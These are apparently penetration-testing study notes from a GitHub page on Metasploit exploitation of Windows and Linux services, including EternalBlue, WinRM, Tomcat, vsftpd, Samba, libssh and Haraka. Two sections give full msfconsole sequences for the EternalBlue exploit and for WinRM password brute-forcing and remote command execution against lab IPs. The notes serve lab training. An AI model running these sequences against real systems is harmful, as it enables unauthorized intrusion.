Skip to content

Latest commit

 

History

History
80 lines (45 loc) · 4.72 KB

exploitation.md

File metadata and controls

80 lines (45 loc) · 4.72 KB
Raw

Exploitation

Windows Exploitation

HFS (HTTP File Server)

A HFS (HTTP File Server) is a file and documents sharing web server.

  • Rejetto HFS - free open source HTTP file server

🔬 HFS - MSF Exploit

SMB - MS17-010 EternalBlue

  • CVE-2017-0144
  • EternalBlue VA
    • EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
    • Patch was released in March 2017

🔬 Check the Lab 2 - Eternal Blue here

  • Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server)

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBlue​db_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb_ms17_010optionsrun​search type:exploit EternalBlueuse exploit/windows/smb/ms17_010_eternalblueoptionsrun

WinRM

  • Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
  • Default WinRM HTTP port is 5985 and HTTPS 5986

🔬 WinRM Attack lab

service postgresql start && msfconsole -qdb_statussetg RHOSTS 10.2.27.173setg RHOST 10.2.27.173workspace -a WinRM​db_nmap -sS -sV -O -p- 10.2.27.173# Port 5985 is set up for WinRMsearch type:auxiliary winrmuse auxiliary/scanner/winrm/winrm_auth_methodsoptionsrun​# Brute force WinRM loginsearch winrm_loginuse auxiliary/scanner/winrm/winrm_loginset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt​search winrm_cmduse auxiliary/scanner/winrm/winrm_cmdset USERNAME administratorset PASSWORD tinkerbellset CMD whoamirunsearch winrm_scriptuse exploit/windows/winrm/winrm_script_execset USERNAME administratorset PASSWORD tinkerbellset FORCE_VBS trueexploit

Apache Tomcat

Apache Tomcat is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.

  • Tomcat default TCP port is 8080
  • Apache web server host HTML/PHP web apps, instead
  • Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE

🔬 Tomcat - MSF Exploit

Linux Exploitation

FTP

vsftpd is an Unix FTP server.

  • vsftpd v.2.3.4 is vulnerable to a command execution vulnerability

🔬 FTP - MSF Exploit

SAMBA

Samba is the Linux implementation of SMB.

  • Samaba v.3.5.0 is vulnerable to a RCE vulnerability

🔬 Samba - MSF Exploit

SSH

libssh is a C library that implements the SSHv2 protocol

  • SSH default TCP port is 22
  • libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability

🔬 SSH - MSF Exploit

SMTP

Haraka is an open source high performance SMTP server developed in Node.js

  • SMTP default TCP port is 25
    • other TCP ports are 465 and 587
  • Haraka prior to v.2.8.9 is vulnerable to command injection

🔬 SMTP - MSF Exploit